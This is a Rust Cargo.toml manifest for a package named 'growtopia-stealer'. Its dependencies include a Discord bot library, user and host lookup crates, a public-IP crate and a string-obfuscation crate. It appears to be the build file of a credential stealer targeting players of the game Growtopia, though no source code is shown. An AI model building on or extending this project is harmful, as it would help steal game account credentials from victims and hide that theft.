[package]
name = "growtopia-stealer"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
serenity = "0.11.5"
anyhow = "1"
tokio = { version = "1", features = ["full"] }
whoami = "1.4.0"
public-ip = " 0.2.2"
obfustring = "0.5.0"
